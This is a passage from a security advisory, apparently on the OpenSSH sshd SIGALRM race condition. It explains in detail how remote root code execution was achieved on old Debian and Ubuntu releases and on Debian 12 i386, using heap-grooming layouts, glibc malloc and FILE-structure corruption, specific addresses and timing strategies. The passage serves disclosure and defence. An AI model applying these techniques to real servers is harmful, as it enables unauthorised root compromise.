 280 |   line 3246 but *before* line 3251, then chunk_Y is already marked as
 281 |   free (because chunk_Z's PREV_INUSE bit is cleared at line 3246) but it
 282 |   is not yet linked into its doubly-linked list (at line 3251): in other
 283 |   words, chunk_Y's fd and bk pointers still contain user data (attacker-
 284 |   controlled data).
 285 | 
 286 | - Second, if (inside the SIGALRM handler) packet_close() calls
 287 |   free(chunk_X), then the code block at lines 3230-3244 is entered
 288 |   (because chunk_Y is marked as free) and chunk_Y is unlink()ed (at line
 289 |   3241): a so-called aa4bmo primitive (almost arbitrary 4 bytes mirrored
 290 |   overwrite), because chunk_Y's fd and bk pointers are still attacker-
 291 |   controlled. For more information on the unlink() technique and the
 292 |   aa4bmo primitive:
 293 | 
 294 |   https://www.openwall.com/articles/JPEG-COM-Marker-Vulnerability#exploit
 295 |   http://phrack.org/issues/61/6.html#article
 296 | 
 297 | - Last, with this aa4bmo primitive we overwrite the glibc's __free_hook
 298 |   function pointer (this old Debian version does not have ASLR, nor NX)
 299 |   with the address of our shellcode in the heap, thus achieving remote
 300 |   code execution during the next call to free() in packet_close().
 301 | 
 302 | ------------------------------------------------------------------------
 303 | Practice
 304 | ------------------------------------------------------------------------
 305 | 
 306 |     Now they're taking over and they got complete control
 307 |         -- The Interrupters, "Liberty"
 308 | 
 309 | To mount this attack against sshd, we interrupt a call to free() inside
 310 | sshd's parsing code of a DSA public key (i.e., line 144 below is our
 311 | free(chunk_Y)) and exploit it during one of the free() calls in
 312 | packet_close() (i.e., one of the lines 341-344 above is our
 313 | free(chunk_X)):
 314 | 
 315 | ------------------------------------------------------------------------
 316 | 136 buffer_get_bignum2(Buffer *buffer, BIGNUM *value)
 317 | 137 {
 318 | 138         u_int len;
 319 | 139         u_char *bin = buffer_get_string(buffer, &len);
 320 | ...
 321 | 143         BN_bin2bn(bin, len, value);
 322 | 144         xfree(bin);
 323 | 145 }
 324 | ------------------------------------------------------------------------
 325 | 
 326 | Initially, however, we were never able to win this race condition (i.e.,
 327 | interrupt the free() call at line 144 at the right time). Eventually, we
 328 | realized that we could greatly improve our chances of winning this race:
 329 | the DSA public-key parsing code allows us to call free() four times (at
 330 | lines 704-707 below), and furthermore sshd allows us to attempt six user
 331 | authentications (AUTH_FAIL_MAX); if any one of these 24 free() calls is
 332 | interrupted at the right time, then we later achieve remote code
 333 | execution inside the SIGALRM handler.
 334 | 
 335 | ------------------------------------------------------------------------
 336 | 678 key_from_blob(u_char *blob, int blen)
 337 | 679 {
 338 | ...
 339 | 693         switch (type) {
 340 | ...
 341 | 702         case KEY_DSA:
 342 | 703                 key = key_new(type);
 343 | 704                 buffer_get_bignum2(&b, key->dsa->p);
 344 | 705                 buffer_get_bignum2(&b, key->dsa->q);
 345 | 706                 buffer_get_bignum2(&b, key->dsa->g);
 346 | 707                 buffer_get_bignum2(&b, key->dsa->pub_key);
 347 | ------------------------------------------------------------------------
 348 | 
 349 | With this improvement, we finally won the race condition after ~1 month:
 350 | we were happy (and did a root-shell dance), but we also felt that there
 351 | was still room for improvement.
 352 | 
 353 | ------------------------------------------------------------------------
 354 | Timing
 355 | ------------------------------------------------------------------------
 356 | 
 357 |     Don't worry, just wait and see
 358 |         -- The Interrupters, "Haven't Seen the Last of Me"
 359 | 
 360 | We therefore implemented the following threefold timing strategy:
 361 | 
 362 | - We do not wait until the last moment to send our (rather large) DSA
 363 |   public-key packet to sshd: instead, we send the entire packet minus
 364 |   one byte (the last byte) long before the LoginGraceTime, and send the
 365 |   very last byte at the very last moment, to minimize the effects of
 366 |   network delays. (And we disable the Nagle algorithm.)
 367 | 
 368 | - We keep track of the median round-trip time (by regularly sending
 369 |   packets that produce a response from sshd), and keep track of the
 370 |   difference between the moment we are expecting our connection to be
 371 |   closed by sshd (essentially the moment we receive the first byte of
 372 |   sshd's banner, plus LoginGraceTime) and the moment our connection is
 373 |   really closed by sshd, and accordingly adjust our timing (i.e., the
 374 |   moment when we send the last byte of our DSA packet).
 375 | 
 376 |   These time differences allow us to track clock skews and network
 377 |   delays, which show predictable patterns over time: we experimented
 378 |   with linear and spline regressions, but in the end, nothing worked
 379 |   better than simply re-using the most recent measurement. Possibly,
 380 |   deep learning might yield even better results; this is left as an
 381 |   exercise for the interested reader.
 382 | 
 383 | - More importantly, we further increase our chances of winning this race
 384 |   condition by slowly adjusting our timing through involuntary feedback
 385 |   from sshd:
 386 | 
 387 |   - if we receive a response (SSH2_MSG_USERAUTH_FAILURE) to our DSA
 388 |     public-key packet, then we sent it too early (sshd had the time to
 389 |     receive our packet in the unprivileged child, parse it, send it to
 390 |     the privileged child, parse it there, and send a response all the
 391 |     way back to us);
 392 | 
 393 |   - if we cannot even send the last byte of our DSA packet, then we
 394 |     waited too long (sshd already received the SIGALRM and closed our
 395 |     connection);
 396 | 
 397 |   - if we can send the last byte of our DSA packet, and receive no
 398 |     response before sshd closes our connection, then our timing was
 399 |     reasonably accurate.
 400 | 
 401 |   This feedback allows us to target what we call the "large" race
 402 |   window: hitting it does not guarantee that we win the race condition,
 403 |   but inside this large window are the 24 "small" race windows (inside
 404 |   the 24 free() calls) that, if hit, guarantee that we do win the race
 405 |   condition.
 406 | 
 407 | With these improvements, it takes ~10,000 tries on average to win this
 408 | race condition; i.e., with 10 connections (MaxStartups) accepted per 600
 409 | seconds (LoginGraceTime), it takes ~1 week on average to obtain a remote
 410 | root shell.
 411 | 
 412 | 
 413 | ========================================================================
 414 | SSH-2.0-OpenSSH_4.2p1 Debian-7ubuntu3 (Ubuntu 6.06.1, from 2006)
 415 | ========================================================================
 416 | 
 417 | ------------------------------------------------------------------------
 418 | Theory, take one
 419 | ------------------------------------------------------------------------
 420 | 
 421 |     I sleep when the sun starts to rise
 422 |         -- The Interrupters, "Alien"
 423 | 
 424 | The SIGALRM handler of this OpenSSH version does not call packet_close()
 425 | anymore; moreover, this Ubuntu's glibc (2.3.6) always takes a mandatory
 426 | lock when entering the functions of the malloc family (even if single-
 427 | threaded like sshd), which prevents us from interrupting a call to one
 428 | of the malloc functions and later exploiting it during another call to
 429 | these functions (they would always deadlock). We must find another
 430 | solution.
 431 | 
 432 | CVE-2006-5051 mentions a double-free in GSSAPI, but GSSAPI (or Kerberos)
 433 | is not enabled by default, so this does not sound very appealing. On the
 434 | other hand, PAM is enabled by default, and pam_end() is called by sshd's
 435 | SIGALRM handler (and is, of course, not async-signal-safe). We therefore
 436 | searched for a PAM function that, if interrupted by SIGALRM at the right
 437 | time, would leave PAM's internal structures in an inconsistent state,
 438 | exploitable during pam_end() in the SIGALRM handler. We found
 439 | pam_set_data():
 440 | 
 441 | ------------------------------------------------------------------------
 442 |  33 int pam_set_data(
 443 |  34     pam_handle_t *pamh,
 444 |  ..
 445 |  37     void (*cleanup)(pam_handle_t *pamh, void *data, int error_status))
 446 |  38 {
 447 |  39     struct pam_data *data_entry;
 448 |  ..
 449 |  57     } else if ((data_entry = malloc(sizeof(*data_entry)))) {
 450 |  ..
 451 |  65         data_entry->next = pamh->data;
 452 |  66         pamh->data = data_entry;
 453 |  ..
 454 |  74     data_entry->cleanup = cleanup;
 455 | ------------------------------------------------------------------------
 456 | 
 457 | If this function is interrupted by SIGALRM *after* line 66 but *before*
 458 | line 74, then data_entry is already linked into PAM's structures (pamh),
 459 | but its cleanup field (a function pointer) is not yet initialized (since
 460 | the malloc() at line 57 does not initialize its memory). If we are able
 461 | to control cleanup (through leftovers from previous heap allocations),
 462 | then we can execute arbitrary code when pam_end() (inside the SIGALRM
 463 | handler) calls _pam_free_data() (at line 118):
 464 | 
 465 | ------------------------------------------------------------------------
 466 | 104 void _pam_free_data(pam_handle_t *pamh, int status)
 467 | 105 {
 468 | 106     struct pam_data *last;
 469 | 107     struct pam_data *data;
 470 | ...
 471 | 112     data = pamh->data;
 472 | 113 
 473 | 114     while (data) {
 474 | 115         last = data;
 475 | 116         data = data->next;
 476 | 117         if (last->cleanup) {
 477 | 118             last->cleanup(pamh, last->data, status);
 478 | ------------------------------------------------------------------------
 479 | 
 480 | This would have been an extremely simple exploit; unfortunately, we
 481 | completely overlooked that pam_set_data() can only be called from PAM
 482 | modules: if we interrupt it with SIGALRM, then pamh->caller_is is still
 483 | _PAM_CALLED_FROM_MODULE, in which case pam_end() returns immediately,
 484 | without ever calling _pam_free_data(). Back to the drawing board.
 485 | 
 486 | ------------------------------------------------------------------------
 487 | Theory, take two
 488 | ------------------------------------------------------------------------
 489 | 
 490 |     Not giving up, it's not what we do
 491 |         -- The Interrupters, "Title Holder"
 492 | 
 493 | We noticed that, at line 601 below, sshd passes a pointer to its global
 494 | sshpam_handle pointer directly to pam_start() (which is called once per
 495 | connection):
 496 | 
 497 | ------------------------------------------------------------------------
 498 |  202 static pam_handle_t *sshpam_handle = NULL;
 499 | ------------------------------------------------------------------------
 500 |  584 sshpam_init(Authctxt *authctxt)
 501 |  585 {
 502 |  ...
 503 |  600         sshpam_err =
 504 |  601             pam_start(SSHD_PAM_SERVICE, user, &store_conv, &sshpam_handle);
 505 | ------------------------------------------------------------------------
 506 | 
 507 | We therefore decided to look into pam_start() itself: if interrupted by
 508 | SIGALRM, it might leave the structure pointed to by sshpam_handle in an
 509 | inconsistent state, which could then be exploited inside the SIGALRM
 510 | handler, when "pam_end(sshpam_handle, sshpam_err)" is called.
 511 | 
 512 | ------------------------------------------------------------------------
 513 |  18 int pam_start (
 514 |  ..
 515 |  22     pam_handle_t **pamh)
 516 |  23 {
 517 |  ..
 518 |  32     if ((*pamh = calloc(1, sizeof(**pamh))) == NULL) {
 519 | ...
 520 | 110     if ( _pam_init_handlers(*pamh) != PAM_SUCCESS ) {
 521 | ------------------------------------------------------------------------
 522 |  319 int _pam_init_handlers(pam_handle_t *pamh)
 523 |  320 {
 524 |  ...
 525 |  398                 retval = _pam_parse_conf_file(pamh, f, pamh->service_name, PAM_T_ANY
 526 | ------------------------------------------------------------------------
 527 |   66 static int _pam_parse_conf_file(pam_handle_t *pamh, FILE *f
 528 |   ..
 529 |   73 {
 530 |  ...
 531 |  252             res = _pam_add_handler(pamh, must_fail, other
 532 | ------------------------------------------------------------------------
 533 |  581 int _pam_add_handler(pam_handle_t *pamh
 534 |  ...
 535 |  585 {
 536 |  ...
 537 |  755     the_handlers = (other) ? &pamh->handlers.other : &pamh->handlers.conf;
 538 |  ...
 539 |  767         handler_p = &the_handlers->authenticate;
 540 |  ...
 541 |  874     if ((*handler_p = malloc(sizeof(struct handler))) == NULL) {
 542 |  ...
 543 |  886     (*handler_p)->next = NULL;
 544 | ------------------------------------------------------------------------
 545 | 
 546 | At line 32, pam_start() immediately sets sshd's sshpam_handle to a
 547 | calloc()ated chunk of memory; this is safe, because calloc() initializes
 548 | this memory to zero. On the other hand, if _pam_add_handler() (which is
 549 | called multiple times by pam_start()) is interrupted by SIGALRM *after*
 550 | line 874 but *before* line 886, then a malloc()ated structure is linked
 551 | into pamh, but its next field is not yet initialized. If we are able to
 552 | control next (through leftovers from previous heap allocations), then we
 553 | can pass an arbitrary pointer to free() during the call to pam_end()
 554 | (inside the SIGALRM handler), at line 1020 (and line 1017) below:
 555 | 
 556 | ------------------------------------------------------------------------
 557 |  11 int pam_end(pam_handle_t *pamh, int pam_status)
 558 |  12 {
 559 |  ..
 560 |  31     if ((ret = _pam_free_handlers(pamh)) != PAM_SUCCESS) {
 561 | ------------------------------------------------------------------------
 562 |  925 int _pam_free_handlers(pam_handle_t *pamh)
 563 |  926 {
 564 |  ...
 565 |  954     _pam_free_handlers_aux(&(pamh->handlers.conf.authenticate));
 566 | ------------------------------------------------------------------------
 567 | 1009 void _pam_free_handlers_aux(struct handler **hp)
 568 | 1010 {
 569 | 1011     struct handler *h = *hp;
 570 | 1012     struct handler *last;
 571 | ....
 572 | 1015     while (h) {
 573 | 1016         last = h;
 574 | 1017         _pam_drop(h->argv);  /* This is all alocated in a single chunk */
 575 | 1018         h = h->next;
 576 | 1019         memset(last, 0, sizeof(*last));
 577 | 1020         free(last);
 578 | 1021     }
 579 | ------------------------------------------------------------------------
 580 | 
 581 | Because the malloc of this Ubuntu's glibc is already hardened against
 582 | the old unlink() technique, we decided to transform our arbitrary free()
 583 | into the Malloc Maleficarum's House of Mind (fastbin version): we free()
 584 | our own NON_MAIN_ARENA chunk, point our fake arena to sshd's .got.plt
 585 | (this Ubuntu's sshd has ASLR but not PIE), and overwrite _exit()'s entry
 586 | with the address of our shellcode in the heap (this Ubuntu's heap is
 587 | still executable by default). For more information on the Malloc
 588 | Maleficarum:
 589 | 
 590 |   https://seclists.org/bugtraq/2005/Oct/118
 591 | 
 592 | ------------------------------------------------------------------------
 593 | Practice
 594 | ------------------------------------------------------------------------
 595 | 
 596 |     I learned everything the hard way
 597 |         -- The Interrupters, "The Hard Way"
 598 | 
 599 | To mount this attack against sshd, we initially faced three problems:
 600 | 
 601 | - The House of Mind requires us to store the pointer to our fake arena
 602 |   at address 0x08100000 in the heap; but are we able to store attacker-
 603 |   controlled data at such a high address? Because sshd calls pam_start()
 604 |   at the very beginning of the user authentication, we do not control
 605 |   anything except the user name itself; luckily, a user name of length
 606 |   ~128KB (shorter than DEFAULT_MMAP_THRESHOLD) allows us to store our
 607 |   own data at address 0x08100000.
 608 | 
 609 | - The size field of our fake NON_MAIN_ARENA chunk must not be too large
 610 |   (to pass free()'s security checks); i.e., it must contain null bytes.
 611 |   But our long user name is a null-terminated string that cannot contain
 612 |   null bytes; luckily we remembered that _pam_free_handlers_aux() zeroes
 613 |   the structures that it free()s (line 1019 above): we therefore "patch"
 614 |   the size field of our fake chunk with such a memset(0), and only then
 615 |   free() it.
 616 | 
 617 | - We must survive several calls to free() (at lines 1017 and 1020 above)
 618 |   before the free() of our fake NON_MAIN_ARENA chunk. We transform these
 619 |   free()s into no-ops by pointing them to fake IS_MMAPPED chunks: free()
 620 |   calls munmap_chunk(), which calls munmap(), which fails because these
 621 |   fake IS_MMAPPED chunks are misaligned; effectively a no-op, because
 622 |   assert()ion failures are not enforced in this Ubuntu's glibc.
 623 | 
 624 | Finally, our long user name also allows us to control the potentially
 625 | uninitialized next field of 20 different structures (through leftovers
 626 | from temporary copies of our long user name), because pam_start() calls
 627 | _pam_add_handler() multiple times; i.e., our large race window contains
 628 | 20 small race windows.
 629 | 
 630 | ------------------------------------------------------------------------
 631 | Timing
 632 | ------------------------------------------------------------------------
 633 | 
 634 |     Same tricks they used before
 635 |         -- The Interrupters, "Divide Us"
 636 | 
 637 | For this attack against Ubuntu 6.06.1, we simply re-used the timing
 638 | strategy that we used against Debian 3.0r6: it takes ~10,000 tries on
 639 | average to win the race condition, and with 10 connections (MaxStartups)
 640 | accepted per 120 seconds (LoginGraceTime), it takes ~1-2 days on average
 641 | to obtain a remote root shell.
 642 | 
 643 | Note: because this Ubuntu's glibc always takes a mandatory lock when
 644 | entering the functions of the malloc family, an unlucky attacker might
 645 | deadlock all 10 MaxStartups connections before obtaining a root shell;
 646 | we have not tried to work around this problem because our ultimate goal
 647 | was to exploit a modern OpenSSH version anyway.
 648 | 
 649 | 
 650 | ========================================================================
 651 | SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2 (Debian 12.5.0, from 2024)
 652 | ========================================================================
 653 | 
 654 | ------------------------------------------------------------------------
 655 | Theory
 656 | ------------------------------------------------------------------------
 657 | 
 658 |     Now you're ready, take the demons head on
 659 |         -- The Interrupters, "Be Gone"
 660 | 
 661 | The SIGALRM handler of this OpenSSH version does not call packet_close()
 662 | nor pam_end(); in fact it calls only one interesting function, syslog():
 663 | 
 664 | ------------------------------------------------------------------------
 665 |  358 grace_alarm_handler(int sig)
 666 |  359 {
 667 |  ...
 668 |  370         sigdie("Timeout before authentication for %s port %d",
 669 |  371             ssh_remote_ipaddr(the_active_state),
 670 |  372             ssh_remote_port(the_active_state));
 671 | ------------------------------------------------------------------------
 672 |  96 #define sigdie(...)             sshsigdie(__FILE__, __func__, __LINE__, 0, SYSLOG_LEVEL_ERROR, NULL, __VA_ARGS__)
 673 | ------------------------------------------------------------------------
 674 | 451 sshsigdie(const char *file, const char *func, int line, int showfunc,
 675 | 452     LogLevel level, const char *suffix, const char *fmt, ...)
 676 | 453 {
 677 | ...
 678 | 457         sshlogv(file, func, line, showfunc, SYSLOG_LEVEL_FATAL,
 679 | 458             suffix, fmt, args);
 680 | ------------------------------------------------------------------------
 681 | 464 sshlogv(const char *file, const char *func, int line, int showfunc,
 682 | 465     LogLevel level, const char *suffix, const char *fmt, va_list args)
 683 | 466 {
 684 | ...
 685 | 489         do_log(level, forced, suffix, fmt2, args);
 686 | ------------------------------------------------------------------------
 687 | 337 do_log(LogLevel level, int force, const char *suffix, const char *fmt,
 688 | 338     va_list args)
 689 | 339 {
 690 | ...
 691 | 419                 syslog(pri, "%.500s", fmtbuf);
 692 | ------------------------------------------------------------------------
 693 | 
 694 | Our two key questions, then, are: Does the syslog() of this Debian's
 695 | glibc (2.36) call async-signal-unsafe functions such as malloc() and
 696 | free()? And if yes, does this glibc still take a mandatory lock when
 697 | entering the functions of the malloc family?
 698 | 
 699 | - Luckily for us attackers, the answer to our first question is yes; if,
 700 |   and only if, the syslog() inside the SIGALRM handler is the very first
 701 |   call to syslog(), then __localtime64_r() (which is called by syslog())
 702 |   calls malloc(304) to allocate a FILE structure (at line 166) and calls
 703 |   malloc(4096) to allocate an internal read buffer (at line 186):
 704 | 
 705 | ------------------------------------------------------------------------
 706 |  28 __localtime64_r (const __time64_t *t, struct tm *tp)
 707 |  29 {
 708 |  30   return __tz_convert (*t, 1, tp);
 709 | ------------------------------------------------------------------------
 710 | 567 __tz_convert (__time64_t timer, int use_localtime, struct tm *tp)
 711 | 568 {
 712 | ...
 713 | 577   tzset_internal (tp == &_tmbuf && use_localtime);
 714 | ------------------------------------------------------------------------
 715 | 367 tzset_internal (int always)
 716 | 368 {
 717 | ...
 718 | 405   __tzfile_read (tz, 0, NULL);
 719 | ------------------------------------------------------------------------
 720 | 105 __tzfile_read (const char *file, size_t extra, char **extrap)
 721 | 106 {
 722 | ...
 723 | 109   FILE *f;
 724 | ...
 725 | 166   f = fopen (file, "rce");
 726 | ...
 727 | 186   if (__builtin_expect (__fread_unlocked ((void *) &tzhead, sizeof (tzhead),
 728 | 187                                           1, f) != 1, 0)
 729 | ------------------------------------------------------------------------
 730 | 
 731 |   Note: because we do not control anything about these malloc()ations
 732 |   (not their order, not their sizes, not their contents), we took the
 733 |   "rce" at line 166 as a much-needed good omen.
 734 | 
 735 | - And luckily for us, the answer to our second question is no; since
 736 |   October 2017, the glibc's malloc functions do not take any lock
 737 |   anymore, when single-threaded (like sshd):
 738 | 
 739 |   https://sourceware.org/git?p=glibc.git;a=commit;h=a15d53e2de4c7d83bda251469d92a3c7b49a90db
 740 |   https://sourceware.org/git?p=glibc.git;a=commit;h=3f6bb8a32e5f5efd78ac08c41e623651cc242a89
 741 |   https://sourceware.org/git?p=glibc.git;a=commit;h=905a7725e9157ea522d8ab97b4c8b96aeb23df54
 742 | 
 743 | Moreover, this Debian version suffers from the ASLR weakness described
 744 | in the following great blog posts (by Justin Miller and Mathias Krause,
 745 | respectively):
 746 | 
 747 |   https://zolutal.github.io/aslrnt/
 748 |   https://grsecurity.net/toolchain_necromancy_past_mistakes_haunting_aslr
 749 | 
 750 | Concretely, in the case of sshd on i386, every memory mapping is
 751 | randomized normally (sshd's PIE, the heap, most libraries, the stack),
 752 | but the glibc itself is always mapped either at address 0xb7200000 or at
 753 | address 0xb7400000; in other words, we can correctly guess the glibc's
 754 | address half of the time (a small price to pay for defeating ASLR). In
 755 | our exploit we assume that the glibc is mapped at address 0xb7400000,
 756 | because it is slightly more common than 0xb7200000.
 757 | 
 758 | Our next question is: which code paths inside the glibc's malloc
 759 | functions, if interrupted by SIGALRM at the right time, leave the heap
 760 | in an inconsistent state, exploitable during one of the malloc() calls
 761 | inside the SIGALRM handler?
 762 | 
 763 | We found several interesting (and surprising!) code paths, but the one
 764 | we chose involves only relative sizes, not absolute addresses (unlike
 765 | various code paths inside unlink_chunk(), for example); this difference
 766 | might prove crucial for a future amd64 exploit. This code path, inside
 767 | malloc(), splits a large free chunk (victim) into two smaller chunks;
 768 | the first chunk is returned to malloc()'s caller (at line 4345) and the
 769 | second chunk (remainder) is linked into an unsorted list of free chunks
 770 | (at lines 4324-4327):
 771 | 
 772 | ------------------------------------------------------------------------
 773 | 1449 #define set_head(p, s)       ((p)->mchunk_size = (s))
 774 | ------------------------------------------------------------------------
 775 | 3765 _int_malloc (mstate av, size_t bytes)
 776 | 3766 {
 777 | ....
 778 | 3798   nb = checked_request2size (bytes);
 779 | ....
 780 | 4295               size = chunksize (victim);
 781 | ....
 782 | 4300               remainder_size = size - nb;
 783 | ....
 784 | 4316                   remainder = chunk_at_offset (victim, nb);
 785 | ....
 786 | 4320                   bck = unsorted_chunks (av);
 787 | 4321                   fwd = bck->fd;
 788 | ....
 789 | 4324                   remainder->bk = bck;
 790 | 4325                   remainder->fd = fwd;
 791 | 4326                   bck->fd = remainder;
 792 | 4327                   fwd->bk = remainder;
 793 | ....
 794 | 4337                   set_head (victim, nb | PREV_INUSE |
 795 | 4338                             (av != &main_arena ? NON_MAIN_ARENA : 0));
 796 | 4339                   set_head (remainder, remainder_size | PREV_INUSE);
 797 | ....
 798 | 4343               void *p = chunk2mem (victim);
 799 | ....
 800 | 4345               return p;
 801 | ------------------------------------------------------------------------
 802 | 
 803 | - If this code path is interrupted by SIGALRM *after* line 4327 but
 804 |   *before* line 4339, then the remainder chunk of this split is already
 805 |   linked into the unsorted list of free chunks (lines 4324-4327), but
 806 |   its size field (mchunk_size) is not yet initialized (line 4339).
 807 | 
 808 | - If we are able to control its size field (through leftovers from
 809 |   previous heap allocations), then we can make this remainder chunk
 810 |   larger and overlap with other heap chunks, and therefore corrupt heap
 811 |   memory when this enlarged, overlapping remainder chunk is eventually
 812 |   malloc()ated and written to (inside the SIGALRM handler).
 813 | 
 814 | Our last question, then, is: given that we do not control anything about
 815 | the malloc() calls inside the SIGALRM handler, what can we overwrite in
 816 | the heap to achieve arbitrary code execution before sshd calls _exit()
 817 | (in sshsigdie())?
 818 | 
 819 | Because __tzfile_read() (inside the SIGALRM handler) malloc()ates a FILE
 820 | structure in the heap (at line 166 above), and because FILE structures
 821 | have a long history of abuse for arbitrary code execution, we decided to
 822 | aim our heap corruption at this FILE structure. This is, however, easier
 823 | said than done: our heap corruption is very limited, and FILE structures
 824 | have been significantly hardened over the years (by IO_validate_vtable()
 825 | and PTR_DEMANGLE(), for example).
 826 | 
 827 | Eventually, we devised the following technique (which seems to be
 828 | specific to the i386 glibc -- the amd64 glibc does not seem to use
 829 | _vtable_offset at all):
 830 | 
 831 | - with our limited heap corruption, we overwrite the _vtable_offset
 832 |   field (a single signed char) of __tzfile_read()'s FILE structure;
 833 | 
 834 | - the glibc's libio functions will therefore look for this FILE
 835 |   structure's vtable pointer (a pointer to an array of function
 836 |   pointers) at a non-zero offset (our overwritten _vtable_offset),
 837 |   instead of the default zero offset;
 838 | 
 839 | - we (attackers) can easily control this fake vtable pointer (through
 840 |   leftovers from previous heap allocations), because the FILE structure
 841 |   around this offset is not explicitly initialized by fopen();
 842 | 
 843 | - to pass the glibc's security checks, our fake vtable pointer must
 844 |   point somewhere into the __libc_IO_vtables section: we decided to
 845 |   point it to the vtable for wide-character streams, _IO_wfile_jumps
 846 |   (i.e., to 0xb761b740, since we assume that the glibc is mapped at
 847 |   address 0xb7400000);
 848 | 
 849 | - as a result, __fread_unlocked() (at line 186 above) calls
 850 |   _IO_wfile_underflow() (instead of _IO_file_underflow()), which calls a
 851 |   function pointer (__fct) that basically comes from a structure whose
 852 |   pointer (_codecvt) is yet another field of the FILE structure;
 853 | 
 854 | - we (attackers) can easily control this _codecvt pointer (through
 855 |   leftovers from previous heap allocations, because this field of the
 856 |   FILE structure is not explicitly initialized by fopen()), which also
 857 |   allows us to control the __fct function pointer.
 858 | 
 859 | In summary, by overwriting a single byte (_vtable_offset) of the FILE
 860 | structure malloc()ated by fopen(), we can call our own __fct function
 861 | pointer and execute arbitrary code during __fread_unlocked().
 862 | 
 863 | ------------------------------------------------------------------------
 864 | Practice
 865 | ------------------------------------------------------------------------
 866 | 
 867 |     I wanted it perfect, no wrinkles in it
 868 |         -- The Interrupters, "In the Mirror"
 869 | 
 870 | To mount this attack against sshd's privileged child, let us first
 871 | imagine the following heap layout (the "XXX"s are "barrier" chunks that
 872 | allow us to make holes in the heap; for example, small memory-leaked
 873 | chunks):
 874 | 
 875 | ---|----------------------------------------------|---|------------|---
 876 | XXX|                  large hole                  |XXX| small hole |XXX
 877 | ---|----------------------------------------------|---|------------|---
 878 |    |                     ~8KB                     |   |    320B    |
 879 | 
 880 | - shortly before sshd receives the SIGALRM, we malloc()ate a ~4KB chunk
 881 |   that splits the large ~8KB hole into two smaller chunks:
 882 | 
 883 | ---|-----------------------|----------------------|---|------------|---
 884 | XXX| large allocated chunk | free remainder chunk |XXX| small hole |XXX
 885 | ---|-----------------------|----------------------|---|------------|---
 886 |    |         ~4KB          |         ~4KB         |   |    320B    |
 887 | 
 888 | - but if this malloc() is interrupted by SIGALRM *after* line 4327 but
 889 |   *before* line 4339, then the remainder chunk of this split is already
 890 |   linked into the unsorted list of free chunks, but its size field is
 891 |   under our control (through leftovers from previous heap allocations),
 892 |   and this artificially enlarged remainder chunk overlaps with the
 893 |   following small hole:
 894 | 
 895 | ---|-----------------------|----------------------|---|------------|---
 896 | XXX| large allocated chunk | real remainder chunk |XXX| small hole |XXX
 897 | ---|-----------------------|----------------------|---|------------|---
 898 |    |         ~4KB          |<------------------------------------->|
 899 |                              artificially enlarged remainder chunk
 900 | 
 901 | - when the SIGALRM handler calls syslog() and hence __tzfile_read(),
 902 |   fopen() malloc()ates the small hole for its FILE structure, and
 903 |   __fread_unlocked() malloc()ates a 4KB read buffer, thereby splitting
 904 |   the enlarged remainder chunk in two (the 4KB read buffer and a small
 905 |   remainder chunk):
 906 | 
 907 | ---|-----------------------|----------------------|---|------------|---
 908 | XXX| large allocated chunk |                      |XXX|    FILE    |XXX
 909 | ---|-----------------------|----------------------|---|--|---------|---
 910 |    |         ~4KB          |<--------------------------->|<------->|
 911 |                                    4KB read buffer        remainder
 912 | 
 913 | - we therefore overwrite parts of the FILE structure with the internal
 914 |   header of this small remainder chunk: more precisely, we overwrite the
 915 |   FILE's _vtable_offset with the third byte of this header's bk field,
 916 |   which is a pointer to the unsorted list of free chunks, 0xb761d7f8
 917 |   (i.e., we overwrite _vtable_offset with 0x61);
 918 | 
 919 | - then, as explained in the "Theory" subsection, __fread_unlocked()
 920 |   calls _IO_wfile_underflow() (instead of _IO_file_underflow()), which
 921 |   calls our own __fct function pointer (through our own _codecvt
 922 |   pointer) and executes our arbitrary code.
 923 | 
 924 |   Note: we have not yet explained how to reliably go from a controlled
 925 |   _codecvt pointer to a controlled __fct function pointer; we will do
 926 |   so, but we must first solve a more pressing problem.
 927 | 
 928 | Indeed, we learned from our work on older OpenSSH versions that we will
 929 | never win this signal handler race condition if our large race window
 930 | contains only one small race window. Consequently, we implemented the
 931 | following strategy, based on the following heap layout:
 932 | 
 933 | ---|------------|---|------------|---|------------|---|------------|---
 934 | XXX|large hole 1|XXX|small hole 1|XXX|large hole 2|XXX|small hole 2|...
 935 | ---|------------|---|------------|---|------------|---|------------|---
 936 |    |    ~8KB    |   |    320B    |   |    ~8KB    |   |    320B    |
 937 | 
 938 | The last packet that we send to sshd (shortly before the delivery of
 939 | SIGALRM) forces sshd to perform the following sequence of malloc()
 940 | calls: malloc(~4KB), malloc(304), malloc(~4KB), malloc(304), etc.
 941 | 
 942 | 1/ Our first malloc(~4KB) splits the large hole 1 in two:
 943 | 
 944 | - if this first split is interrupted by SIGALRM at the right time, then
 945 |   the fopen() inside the SIGALRM handler malloc()ates the small hole 1
 946 |   for its FILE structure, and we achieve arbitrary code execution as
 947 |   explained above;
 948 | 
 949 | - if not, then we malloc()ate the small hole 1 ourselves with our first
 950 |   malloc(304), and:
 951 | 
 952 | 2/ Our second malloc(~4KB) splits the large hole 2 in two:
 953 | 
 954 | - if this second split is interrupted by SIGALRM at the right time, then
 955 |   the fopen() inside the SIGALRM handler malloc()ates the small hole 2
 956 |   for its FILE structure, and we achieve arbitrary code execution as
 957 |   explained above;
 958 | 
 959 | - if not, then we malloc()ate the small hole 2 ourselves with our second
 960 |   malloc(304), etc.
 961 | 
 962 | We were able to make 27 pairs of such large and small holes in sshd's
 963 | heap (28 would exceed PACKET_MAX_SIZE, 256KB): our large race window now
 964 | contains 27 small race windows! Achieving this complex heap layout was
 965 | extremely painful and time-consuming, but the two highlights are:
 966 | 
 967 | - We abuse sshd's public-key parsing code to perform arbitrary sequences
 968 |   of malloc() and free() calls (at lines 1805 and 573):
 969 | 
 970 | ------------------------------------------------------------------------
 971 | 1754 cert_parse(struct sshbuf *b, struct sshkey *key, struct sshbuf *certbuf)
 972 | 1755 {
 973 | ....
 974 | 1797         while (sshbuf_len(principals) > 0) {
 975 | ....
 976 | 1805                 if ((ret = sshbuf_get_cstring(principals, &principal,
 977 | ....
 978 | 1820                 key->cert->principals[key->cert->nprincipals++] = principal;
 979 | 1821         }
 980 | ------------------------------------------------------------------------
 981 |  562 cert_free(struct sshkey_cert *cert)
 982 |  563 {
 983 |  ...
 984 |  572         for (i = 0; i < cert->nprincipals; i++)
 985 |  573                 free(cert->principals[i]);
 986 | ------------------------------------------------------------------------
 987 | 
 988 | - We were unable to find a memory leak for our small "barrier" chunks;
 989 |   instead, we use tcache chunks (which are never really freed, because
 990 |   their inuse bit is never cleared) as makeshift "barrier" chunks.
 991 | 
 992 | To reliably achieve this heap layout, we send five different public-key
